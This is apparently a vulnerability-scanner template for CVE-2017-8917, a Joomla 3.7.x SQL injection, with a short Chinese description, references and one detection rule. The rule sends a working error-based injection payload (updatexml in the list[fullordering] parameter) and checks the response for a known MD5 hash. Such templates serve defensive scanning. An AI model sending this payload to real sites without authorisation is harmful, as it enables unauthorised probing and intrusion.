漏洞描述
SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors.
id: CVE-2017-8917
info:
name: Joomla SQL Injection
author: unkown
severity: critical
description: |-
SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-8917
- https://www.joomla.org/announcements/security-announcement/137-joomla-3-8-1.html
- https://www.joomla.org/announcements/security-announcement/136-joomla-3-7-8.html
- https://www.joomla.org/announcements/security-announcement/135-joomla-3-6-10.html
tags: cve,cve2017,joomla,sqli
created: 2023/08/10
rules:
r0:
request:
method: GET
path: /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)
expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2")
expression: r0()